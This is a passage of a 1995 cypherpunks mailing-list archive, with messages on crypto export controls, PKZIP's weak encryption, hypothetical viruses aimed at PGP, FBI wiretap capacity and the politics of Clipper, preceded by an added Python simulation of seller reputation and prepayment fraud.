behavior.)  Producers who want to cheat could do so by offering greater
discounts for payment in advance, offering low prices in order to
attract as many customers as possible before disappearing.  Consumers
might rightly be suspicious of an offer that looks too good.

Maybe it could be set up so consumers could cheat, too.  No, I think that
is too complicated.  Then producers would have to know consumers'
reputations and I think it gets muddy.  Probably it would be simplest to
just have producers have reputations.

Hal
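A minimal version of the simulation sketched in the message above, added here as an example and not code from the thread. The prices, the three producer strategies and the three consumer strategies are constructed assumptions; only producers have reputations, as the message suggests.

```python
from dataclasses import dataclass
from typing import Optional

VALUE = 10      # utility of one delivered unit to any consumer (constructed)
COST = 6        # production cost, identical for all producers (constructed)
COD_PRICE = 9   # cash on delivery: nothing is paid in advance, nothing to steal


@dataclass
class Producer:
    name: str
    prepay_price: int
    cheat_round: Optional[int] = None  # round in which prepayments are kept
    active: bool = True
    deliveries: int = 0                # public track record
    profit: int = 0


def bargain_hunter(producers):
    """Always prepays whoever is cheapest."""
    return min(producers, key=lambda p: p.prepay_price), "prepay"


def skeptic(producers, min_history=2):
    """Prepays only plausible prices from producers with a track record."""
    trusted = [p for p in producers
               if p.prepay_price >= COST and p.deliveries >= min_history]
    if trusted:
        return min(trusted, key=lambda p: p.prepay_price), "prepay"
    return producers[0], "cod"


def cod_only(producers):
    """Never pays in advance and accepts the worse price."""
    return producers[0], "cod"


def simulate(rounds):
    producers = [Producer("steady", 8),
                 Producer("long_con", 7, cheat_round=3),
                 Producer("fly_by_night", 5, cheat_round=0)]
    consumers = {"bargain_hunter": bargain_hunter,
                 "skeptic": skeptic,
                 "cod_only": cod_only}
    utility = dict.fromkeys(consumers, 0)
    for rnd in range(rounds):
        active = [p for p in producers if p.active]
        delivered = []                     # track records update at end of round
        for name, choose in consumers.items():
            seller, mode = choose(active)
            if mode == "prepay" and seller.cheat_round == rnd:
                seller.profit += seller.prepay_price   # keeps money, ships nothing
                utility[name] -= seller.prepay_price
                continue
            price = seller.prepay_price if mode == "prepay" else COD_PRICE
            seller.profit += price - COST
            utility[name] += VALUE - price
            delivered.append(seller)
        for p in delivered:
            p.deliveries += 1
        for p in active:
            if p.cheat_round == rnd:
                p.active = False           # absconds after cheating
    return utility, {p.name: p.profit for p in producers}


if __name__ == "__main__":
    for n in (6, 12):
        print(n, *simulate(n))
```

With these constructed numbers the cash-on-delivery buyer does best over 6 rounds and the skeptic over 12. The long con still catches the skeptic once its track record reaches the threshold.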




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ahupp@primenet.com (Adam Hupp)
Date: Wed, 22 Nov 1995 05:45:53 +0800
To: ylo@cs.hut.fi
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <199511212106.OAA22450@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Tue, 21 Nov 1995 02:10:02 +0100
>From: Tatu Ylonen <ylo@cs.hut.fi>
>To: ahupp@primenet.com
>Cc: cypherpunks@toad.com
>Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
>
>> PKZIP allows encryption (others?).  How about a hook to that?
>
>PKZIP "encryption" is self-deception.  A program for cracking it,
>PKCRACK, is widely available on the internet.  See e.g.
>ftp.funet.fi:/pub/crypt/analysis.  
>
>[For information about internationally available cryptographic
>software, see http://www.cs.hut.fi/crypto.]
>
>    Tatu Ylonen <ylo@cs.hut.fi>

PKCRACK uses a dictionary attack. Anyway, my point was that you could use
PKZIP's encryption as an excuse for passing a password.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 22 Nov 1995 06:53:16 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Proving I'm not Bob.
In-Reply-To: <Pine.NXT.3.91.951121142858.1144A-100000@litoria>
Message-ID: <199511212210.RAA11334@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


s1113645@tesla.cc.uottawa.ca writes:
> I had an idea for an advertising based net-payment scheme that has 
> a particular security flaw making it totally untrustworthy unless it is
> possible to prove that you are not a particular person (the publisher 
> receiving the ad money) when consuming (viewing or otherwise) the ads.

david writes:
> What is this system?  I can't think of any system that wouldn't work if 
> rearranged so that instead of proving you aren't Bob, you simply don't 
> prove that you are.  It is true that they are not isomorphic, and that 
> could be a problem in some situations, but I don't see this as one of them.

I don't know what particular scheme s1113645 has in mind. But as you point
out, not proving P is very different from proving not-P. Generally, a scheme
that charges for advertising based upon the measured number of accesses to
the advertising has the kind of authentication problem mentioned above. The
party paying for the advertising only wants to pay to reach "legitimate" 
customers. A dishonest publisher (selling ad space) could access the
advertising many times herself to artificially inflate the access figures,
justifying higher advertising charges. 

To avoid paying for this "illegitimate" traffic, the advertiser would like to
authenticate the accesses as *not* coming from the untrusted publisher. This
is a hard problem in general, because the advertiser really wants to discount 
accesses by the publisher, her agents, her family, her friends, etc. It's
tough to prove that you're not working for someone else at a formal protocol
level.

(Note that widespread "legitimate" anonymous accesses of material can
severely damage the reliability of these kinds of measurement-based payment
schemes.)

I think this thread is rapidly straying from cpunks relevance....

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Wed, 22 Nov 1995 08:02:02 +0800
To: cypherpunks@toad.com
Subject: The Congressional Mailbot
Message-ID: <199511212318.QAA26412@mailhost1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Here's your chance to protest ITAR and 
whatever other CPUNK thing you feel worthwhile.
Enjoy!


CONGRESSIONAL MAILBOT SERVICE

This service is provided to make it easy for you to get your message to
all members of the House or Senate that have E-Mail mailboxes.  By sending
a single message to the service addressed at HOUSE@MAILBOT.COM and/or
SENATE@MAILBOT.COM, your single message will be expanded and resent to all
members of those specified houses as if YOU had E-Mailed each and everyone
of them yourself.

Any E-Mail responses to your inquiries will be sent directly back to your
own E-Mail box.

WHERE DO I SEND MY E-MAIL TO MAKE THIS HAPPEN?

In order to use this service, you need to address your E-Mail to one or
both of the addresses listed below.

FOR MEMBERS OF THE US HOUSE:
         House@Mailbot.com
FOR MEMBERS OF THE US SENATE:
         Senate@Mailbot.com

WHO WILL RECEIVE THIS E-MAIL?

Your incoming message is sent to all currently known members of congress
that have E-Mail mailboxes.  The Congressional Mailbot System updates its
list of members of both the Houses every 30 days.  At that time, new email
addresses are added to the Mailbot Server.


WHAT TO INCLUDE IN YOUR MESSAGE?

Most members of congress do not have the staff to deal with replies via
both regular mail and E-Mail.  Most would prefer to reply to your specific
request by way of regular postal mail.  In order for them to do that, you
need to include your NAME, ADDRESS, CITY & STATE so that they can send you
a response.


WHAT NOT TO INCLUDE IN YOUR MESSAGE?

Basically, your message should be short and to the point.  It is not wise
to include large amounts of text from other sources.  If you want to point
out to them about such sources, simply tell them where you saw it.
Imagine getting hundreds of email messages containing the same material
over and over.  The meaning gets lost.  Make your message clear and easy
to read.

WARNING

Each member of the House or Senate which receives a message from you via
the Mailbot, will respond with a reply message.

           THIS CAN GENERATE A LOT OF EMAIL INTO YOUR MAILBOX.

If for example, at the time you send your request to the Mailbot, there
are 130 members of the specific house you select, you will get back 130
reply messages from those members when they receive your message.
Currently, the automatic replies are about 750 bytes in size and only
contain a header with no message body.

These replies are sent to let you know that the Congress Person you sent
the message to, has received it in their E-Mailbox.

Some users use systems that only allow so much email per month for free
and then charge for email sent/received after that!


IF YOU CANNOT HAVE THIS AMOUNT OF TRAFFIC IN YOUR MAILBOX
PLEASE DO NOT USE THIS SERVICE!


WHAT IF I WANT TO SEND A MESSAGE TO A SPECIFIC Congress Person?

THEN YOU SHOULD NOT USE THIS SERVICE!  This service is for E-Mail intended
for ALL members of the House and/or Senate.  Individual messages to
specific Congress Persons should be sent by other means.


LIMITATIONS:

This is a very popular tool....  Several rules need to be enforced to
ensure that this service does not overburden the systems that are
connected to it.  The following rules are in place...

    1 The Mailbot will reject any message that is larger than 5,000 bytes
in size.  This provides you with a total of 66 lines of 80 columns per
line for your message which is a whole page of information to make your
point.

    2 Please limit usage of the mailbot to no more than one message per 72
hour period (one each to HOUSE and SENATE is ok).

    3 Abusive and obscene messages violate the purpose and spirit of this
service and WILL place the originator of such messages on a rejection
list.

Users who cannot abide by the above limitations will be placed permanently
on a rejection list and all further attempts to use the service will
result in that user's messages being rejected by the service.

PROBLEMS OR QUESTIONS?

If you have any problems or questions about this service, please direct
them to the following E-Mail address:  Mailbot@Mailbot.Com

TELL A FRIEND?

If you should tell a friend or colleague about this service, PLEASE
INCLUDE THIS MESSAGE.  This will save them time in knowing what is
permitted and will keep questions about the service down to a minimum.


This Service is Provided By:
                       MAILBOT SERVICES OF ARIZONA
                       (c) 1995 Mailbot Services of Arizona.
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Lull <lull@acm.org>
Date: Wed, 22 Nov 1995 02:17:43 +0800
To: SINCLAIR DOUGLAS N <sinclai@ecf.toronto.edu>
Subject: Re: Virus attacks on PGP
In-Reply-To: <95Nov21.083447edt.10061@cannon.ecf.toronto.edu>
Message-ID: <199511211743.JAA06639@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 21 Nov 1995 08:34:46 -0500, you wrote:

> Seeing as PGP is quite small the simplest and cheapest read-only device
> would be a write-protected floppy disk.
> 
> Could a virus write to a write-protected disk?  I'm not sure if the
> protection is done in the BIOS or the drive hardware.

In the drive hardware.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 22 Nov 1995 01:53:58 +0800
To: cypherpunks@toad.com
Subject: Re: "Junk E-Mail"
Message-ID: <199511211647.RAA15185@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Sten wrote:

>        They (as in, the government) have used the RICO laws against
>Operation Rescue, an anti-abortion/pro-life (pick your term) group for
>protesting/picketing abortion clinics and doctors who perform abortions.

      And for successfully encouraging the murder of doctors. 

>If they had prosecuted under statutes which applied to everyone, I
>wouldn't have had a problem, but they are going after OR and similar
>organizations for using tactics similar to those used by civil rights
>protesters in the 60s.

      Who were systematically arrested, beaten, teargassed, wiretapped,
and even occasionally shot at. I *know*--I got firehosed, beaten,
arrested, and wiretapped for what I did. That's why I'm a Cypherpunk now.
      OR has received far better treatment than the civil rights
protesters ever did--or did I miss the news items reporting that Terry
Randall and Ralph Reed had been assassinated, and that their lieutenants
had been bumped off in black-bag jobs, and that their colleagues were
chained down to chairs *in court*?

>                       'Course, civil rights is Politically Correct.
>Abortion rights is Politically Correct.  Protesting abortion is
>Politically Incorrect, therefore illegal.

      Do you usually send nursery rhymes to mailing lists?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 23 Nov 1995 09:43:43 +0800
To: cypherpunks@toad.com
Subject: Re: Spam the Sign!
In-Reply-To: <199511210121.RAA02291@goblin.punk.net>
Message-ID: <30B28651.57A@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


sameer wrote:
> 
> >
> > And as far as needing government approval, I noticed that Sameer has an
> > export controlled ftp server at c2.org.  Maybe he could tell us what is
> > necessary to setup such an animal.
> >
> > --
> 
>         I do what RSADSI does with ftp.rsa.com. It requires a cronjob
> and sed. I didn't get the NSA to approve it, but I figure if it's good
> enough for RSADSI it's good enough for me.

  Do you have a legal opinion to support this statement?  Our lawyers
tell us that executives of netscape could go to jail if we make the
128bit version of netscape available from an "export controlled"
ftp or http server.  We are working to clarify the situation with
the government or figure out an alternative distribution scheme that
will remove us from the grey area.

  Getting the US version of netscape widely available is one of my
highest priorities, but I can't tell Barksdale that he should go to
jail over it.  I'm constantly pushing from within the company to keep
things moving forward.

  In the meantime I apologize to the linux users who can't even
buy the 128 bit version.  If something changes on this front I'll
be sure to let people know.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 22 Nov 1995 11:10:00 +0800
To: cypherpunks@toad.com
Subject: Re: Export control FTP servers
In-Reply-To: <9511210441.AA26515@sulphur.osf.org>
Message-ID: <30B28957.4C06@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


I thought that they had not yet released their official policy.  Last
time I heard they were still refusing to put anything in writing saying
that your measures were "ok", pending release of their official policy.

  If John is indeed leaving, this will give the powers-that-be an
excuse to delay even longer.

	--Jeff

attila wrote:
> 
> well, since it is "official" policy and the basics concern rejecting all
> foreign addresses and making the proposed recipient agree to a file
> statement agreeing not to export and that he/she/it is an American or
> Canadian citizen, it might be nice if someone who has the `sed ....`
> and/or `awk...` scripts would post them for all to use (with whatever
> disclaimers, etc.)
> 
> On Mon, 20 Nov 1995, Rich Salz wrote:
> 
> > >     I do what RSADSI does with ftp.rsa.com. It requires a cronjob
> > >and sed. I didn't get the NSA to approve it, but I figure if it's good
> > >enough for RSADSI it's good enough for me.
> >
> > I believe some of the following has been posted here before.
> > The person to speak with is
> >       John Sonderman
> >       Office of Defense Trade
> >       Department of Compliance
> >       703 875 6644
> > He's supposed to be Internet-aware.   What's not common knowledge is
> > that he's leaving by early December for budgetary reasons.  If you're
> > thinking of putting export controlled stuff up for FTP, you should
> > probably contact John now.
> >       /r$
> >

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Whalley <ian@virusbtn.com>
Date: Wed, 22 Nov 1995 03:07:56 +0800
To: cypherpunks@toad.com
Subject: Re: Virus attacks on PGP
In-Reply-To: <199511211743.JAA06639@ix8.ix.netcom.com>
Message-ID: <199511211832.SAA12002@elbereth.sophos.com>
MIME-Version: 1.0
Content-Type: text/plain


>>Could a virus write to a write-protected disk?  I'm not sure if the
>>protection is done in the BIOS or the drive hardware.
>In the drive hardware.

In certain rare cases, drive hardware fails in such a way as to allow
write access to write-protected diskettes - I have one such machine
here.  This appears to happen more often in 5.25" drives - perhaps
this is simply because most of the ones I come in contact with are
older than the 3.5" ones.

This is not a suitable viral attack, however, least of all against
a specific target like PGP.  However, viruses attacking specific
programs are well-known, both in concept and actuality - take
AntiEXE, which will corrupt certain sector reads if the sector
starts with a given byte pattern.  In a similar way it would be possible
to attack PGP, at least on DOS platforms.   However, it would be
dependent upon compiler used/version of PGP/etc etc, and only
work in a few cases.

More likely is something which waits to see when a certain program
is run (let's say PGP :-)), and records keystrokes (keyphrase,
anyone?).  Then it takes a copy of the secret key file along with
the keyphrase, and is able to do whatever it likes with them.

Slightly off-topic, for which I apologise, but there we go.

I.

---------------------------------------------------------------------
| Ian Whalley, Editor,   |    Phone/Fax : +44-1235-555139/531889    |
| Virus Bulletin,        |    DDI       : +44-1235-544039           |
| 21 The Quadrant,       |------------------------------------------|
| Abingdon Science Park, |    PGP key   :   2A 02 96 E5 5D 77 4C 8D |
| Oxon, OX14 3YS, UK.    |  fingerprint :   EB 22 14 6F E0 3B A0 D3 |
---------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 22 Nov 1995 08:10:49 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Interesting statement by Alameda County DA
Message-ID: <199511212334.SAA02295@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by iang@cory.EECS.Berkeley.EDU (Ian Goldberg) 
on Tue, 21 Nov  1:50 PM

>One of the speakers was Don Ingraham, Assistant 
>District Attorney,  Alameda County.  In responding to a 
>question from the audience, he said:
>
>"You're making a distinction between criminals and big 
>business.
>    That is not my experience."


   Assistant Devil's Angel Ingraham cites two out of three,
   the other is the omnipresent public safety racket -- his
   temp job in train to future peace by salubrious punishment
   of the other two overtense sinners.

   Often, a backlasher rep in one leads to a pretend-
   thrasher slot in the others. RICO, for instance, is an
   ingenious selective-caning law for flyswatting one
   conspirator by another but to not go so far as to bruise
   flesh and foreclose franchises for prosecutorial
   "shiatsu."

   This ancient soft-drubbing by one of the others is meant to
   conceal their common-origin ritual of corporeal writhings,
   manipulations, strokings, caresses and digitizers to debase
   from upright to bent to kneeling to prone succeeding down
   ladder, applying lubricants, linguants, unguents, balms, 
   dental whiteners and body hair to head, to rest six under.

   Criminal, financial, legal -- indistinguishable from any
   other mortality-salving levitationism.

   -- From The One Outback Truth.


>   "Hey, Ian _said_ it was noise."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Wed, 22 Nov 1995 08:42:52 +0800
To: David Scheidt <david@math.earlham.edu>
Subject: Re: Proving I'm not Bob.
In-Reply-To: <Pine.NXT.3.91.951121142858.1144A-100000@litoria>
Message-ID: <Pine.3.89.9511211956.A45492-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 21 Nov 1995, David Scheidt wrote:

> What is this system?  I can't think of any system that wouldn't work if 
> rearranged so that instead of proving you aren't Bob, you simply don't 
> prove that you are.  It is true that they are not isomorphic, and that 
> could be a problem in some situations, but I don't see this as one of them.

Hal and Futplex pretty much described it. I figured a proof of non-identity
(if possible) would have saved one hell of a lot of messy authentication
in those cases when there is only one possible cheater (due to economic 
incentives) with many possible pseudonyms (or friends).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 22 Nov 1995 12:03:28 +0800
To: Peter Wayner <pcw@access.digex.net>
Subject: Re: Are there enough FBI agents to handle Digital Telephony?????
In-Reply-To: <v02130512acd7941208f9@[199.125.128.5]>
Message-ID: <Pine.ULT.3.91.951121193502.5283A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Don't the numbers include all types of interceptions, both wiretaps and 
records of what number you call?

You also don't need to listen live. Recording media is cheap these days. 
Record all calls, put into a database keyed by time and number called, 
refer to it later.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 23 Nov 1995 04:43:28 +0800
To: hallam@w3.org
Subject: Re: "Dear Newt" Letter...
In-Reply-To: <9511210055.AA29106@zorch.w3.org>
Message-ID: <199511220100.UAA17883@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



hallam@w3.org writes:
> 
> >Er, Newt was the one who railed against the Exon censorship bill, and
> >who's said in public that clipper is unrealistic.
> 
> And where does that get us? Did Newt stop the Exon bill in its tracks?
> Did he do anything to stop the wiretap bill?

And what did any of the Democrats do?

Anyone who thinks that Democrats are "better" for privacy and personal
freedom than Republicans has probably been taking very high quality
drugs indeed. A Democratic president has been pushing Clipper --
Senator Exon is a Democrat.


.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Wed, 22 Nov 1995 03:48:00 +0800
To: cypherpunks@toad.com
Subject: toolkits?
Message-ID: <199511211927.UAA20586@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


|Alice here ...
|
|No, *I* am the real Alice, and I refuse to use PGP signing.
|
|Alice de 'nonymous ...
|
|
|P.S.  This post is in the public domain.
|                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.


No, *I* am the real Alice, and *I* refuse to use PGP signing.

Alice de 'nonymous ...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Weld Pond <weld@l0pht.com>
Date: Wed, 22 Nov 1995 11:01:17 +0800
To: cypherpunks@toad.com
Subject: Pedophiles use encoding devices to make secret use of Internet
Message-ID: <Pine.BSD/.3.91.951121205509.15079A-100000@l0pht.com>
MIME-Version: 1.0
Content-Type: text/plain



Story in Nando Times

http://www2.nando.net/newsroom/ntn/info/info429_4.html


      Weld Pond   -  weld@l0pht.com   -   http://www.l0pht.com/
      L  0  p  h  t    H  e  a  v  y    I  n  d  u  s  t  r  i  e  s          
      Technical archives for the people  -  Bio/Electro/Crypto/Radio





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 23 Nov 1995 09:35:26 +0800
To: cypherpunks@toad.com
Subject: Re:  "The Right To Privacy" by Caroline Kennedy, et. al.
Message-ID: <9511220155.AA28801@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


I've heard a couple of media interviews (CNBC Equal Time, and NPR
Talk of the Nation).  It sounds like a good collection of issues and
scare stories.  Experienced people on this list might learn a few things
to round out the overall picture, but it's probably best for the general
public.  I hope it does real well.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Stuart <fstuart@vetmed.auburn.edu>
Date: Wed, 22 Nov 1995 11:38:50 +0800
To: jsw@netscape.com
Subject: Re: Spam the Sign!
Message-ID: <199511220307.VAA01713@snoopy.vetmed.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


[...]
>  Do you have a legal opinion to support this statement?  Our lawyers
>tell us that executives of netscape could go to jail if we make the
>128bit version of netscape available from an "export controlled"
>ftp or http server.  We are working to clarify the situation with
>the government or figure out an alternative distribution scheme that
>will remove us from the grey area.

No legal opinions here, but perhaps you give it to someone who you know is
legally entitled to have it and give them permission to redistribute it.  For
example, MIT, RSA, and c2.org already distribute export-controlled software
via FTP, so if they're willing, you could give copies to people there and
publish MD5 checksums.

>  Getting the US version of netscape widely available is one of my
>highest priorities, but I can't tell Barksdale that he should go to
>jail over it.  I'm constantly pushing from within the company to keep
>things moving forward.

It's appreciated as is your participation here.

>  In the mean time I apologize to the linux users who can't even
>buy the 128 bit version.  If something changes on this front I'll
>be sure to let people know.


                          | (Douglas) Hofstadter's Law:
Frank Stuart              | It always takes longer than you expect, even 
fstuart@vetmed.auburn.edu | when you take into account Hofstadter's Law.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Thu, 23 Nov 1995 09:51:45 +0800
To: cypherpunks@toad.com
Subject: Re: "Dear Newt" Letter...
In-Reply-To: <199511220100.UAA17883@jekyll.piermont.com>
Message-ID: <9511220208.AA29462@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>And what did any of the Democrats do?

>Anyone who thinks that Democrats are "better" for privacy and personal
>freedom than Republicans has probably been taking very high quality
>drugs indeed. A Democratic president has been pushing Clipper --
>Senator Exon is a Democrat.

Yes, and Coates is a Republican. Meanwhile Grassley and Dole have a parallel set
of lossage. Incidentally, on the Exon-Coates amendment, look into the connections
between Rimm and the Christian right. The legal footnotes were apparently
drafted by legal counsel for the Christian Coalition. Granted there are few
friends of the Christian Right's manifesto on the Internet, I personally
consider them an entryist group which the Republicans should recognise as a
liability.

The point was that the original post made the assumption that the Republicans
were somehow differentiated from the Democrats on this. It's simply not true.
Clipper was started under Bush (or possibly Reagan) and Clinton carried it over
without change. I don't see any sign at present that a Republican president
wouldn't simply continue as well.

The only way something is going to get done is if the Clipper program gets
labeled with the "take out with the trash" tag. Essentially there are always a
whole series of civil service initiatives that continue from administration to
administration that everybody knows are loser ideas but it is easier to
continue with them than give the opposition an opportunity to claim that it was
a retreat. It sounds (and is) a stupid way to do politics but that is the way it
works. For some reason the American people consider stopping a bad policy to be
a "flip-flop" and hence something which demonstrates the unfitness of the office
holder, just as willingness to negotiate is "vacillation".

It's not a new principle. Clinton axed a whole raft of programs that the Bush
administration had realised were losers but had continued for the same reason.

What you have to avoid here is making the issue one of party politics. First off 
you will lose because you will bet on the losing side at least half the time. 
Secondly policies that get into the party political arena end up being treated 
in an absolutist and ideological manner which prevents any common sense input. 
You are likely to find both sides taking positions you don't like simply because 
it is advantageous politically.

Secondly you are likely to win the argument in the Congress and then lose it in
the White House. The next administration will be either Dole or Clinton, more
likely Clinton because Dole is a fossil and the next election will not be about 
the second world war or the cold war, it will be about responding to new 
technology. Neither Dole nor Clinton is likely to respond well to a mandate from 
congress concerning issues of national security. That is the card the FBI will 
play. The NSA have their own card but none of us know what their real concern 
is.

What I am saying is that we must not allow the Congress to attempt to beat up
the White House. They simply do not have leverage on this issue. No President
will overrule the experts on a matter of National security lightly, if it is a
partisan congressional mandate it will be much easier to reject.


A much better strategy is to portray the FBI as being a rogue agency acting
outside their brief. The debate must be turned from a simple question of privacy
versus national security which you will lose regardless of which party is in
power to one of economic security versus short term national security. You need
to point out the economic cost of insecure communications. You have to bring to
light the behaviour of the French for example. Make it clear that US companies
are losing business because the French regularly tap fax communications.
Make it clear that encryption is essential to provide high grade protection
against hackers.


The privacy issue may be what drives cypherpunks but it is not the argument 
which will work in the arena you need to be heard in. They do not care about 
privacy, most particularly not protection against government intrusion. They are
not even that concerned about protecting individuals' privacy against corporate
abuse.

If you make it a party issue you will not only lose but risk turning the clock 
the other way. At the moment everyone knows that the export control laws are not 
stopping people from getting PGP. It is not a good idea to rub people's noses in
it. It is easy to ignore export violations by turning a blind eye. It is 
difficult to turn a blind eye when people are so anxious to announce what is 
going on. Phil Z. is not having problems because he wrote PGP, he is having 
problems because he made sure the FBI couldn't pretend they did not know what 
was going on.

If you make encryption a party issue then one of those Grassley bills will pass 
and the President in power may not veto it.


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 23 Nov 1995 09:48:11 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Are there enough FBI agents to handle Digital Telephony?????
In-Reply-To: <acd75bfd090210044420@[205.199.118.202]>
Message-ID: <199511220216.VAA18082@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> At 4:05 PM 11/21/95, Peter Wayner wrote:
> >Has anyone ever done the math on the FBI's new wire tapping
> >proposals and determined whether they'll have enough agents to
> >do all of the listening?> ...
> 
> The manpower shortage can be solved by moving the listening step offshore,
> perhaps to one of the Caribbean islands that processes credit card slips.

Am I the only person who thought that the point was to be able to
selectively target certain areas but not necessarily all areas? For
instance, let's say the known criminal Tim May is going to be in some
place for a while -- by conducting roving taps of all conversations, I
can find him. 1% capacity should be enough to make that practical. As
another example, let's say there is some sort of political insurgency
building up in some city -- presumably, one could devote all one's
roving manpower to just that place for a few weeks and crush it.

I can see no conventionally legitimate need or way to exploit the
capability, but with unconventional and illegitimate techniques...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Thu, 23 Nov 1995 02:30:41 +0800
To: ethridge@Onramp.NET (Allen B. Ethridge)
Subject: Re: Are there enough FBI agents to handle Digital Telephony?????
In-Reply-To: <v02130500acd7e7228be6@[199.1.154.51]>
Message-ID: <199511220222.VAA00560@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> The FBI's "requirements" present an entertaining set of logistical
> problems.  Simply equipping the switches to handle the extra capacity,
> especially during busy hour, is problematic.

The sources I consulted were nowhere near as restrained.
"Out of their trees" was the most concise reply I heard.
And *this* was from someone WORKING in the FI community
in technical areas.



-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 22 Nov 1995 10:55:41 +0800
To: "L. DEkel" <dekel@carmel.haifa.ac.il>
Subject: Re: PKZIP - Encryption
In-Reply-To: <Pine.A32.3.91.951122035639.51855A-100000@carmel.haifa.ac.il>
Message-ID: <199511220223.VAA18118@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"L. DEkel" writes:
> PKZIP Encryption:
> 
> PKZIP encryption is often said to be: Weak, "a joke" ,"a deception" etc.
> Maybe it's time to put things in the right perspective.
> 
> One must realize (yet again) the difference between:
> Theoretical Cryptography - and - Practical Cryptography:

Er, I don't understand.

I could see why one would want to use a weak encryption system if it
bought you something. However, good encryption systems are as cheap to
use as bad ones. Therefore, why ever use a bad one? If the top of the
line lock costs the same amount as a toy lock, why buy a toy?

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Wed, 22 Nov 1995 05:39:27 +0800
To: pcw@access.digex.net
Subject: Re: Are there enough FBI agents to handle Digital Telephony?????
In-Reply-To: <v02130512acd7941208f9@[199.125.128.5]>
Message-ID: <199511212053.VAA02472@trance.olari.clinet.fi>
MIME-Version: 1.0
Content-Type: text/plain


> For instance, if 1% of America is on the phone during the peak
> hours of the day, then that puts 2.5 million Americans on the
> phone or 1.25 million conversations. If the FBI wants access to
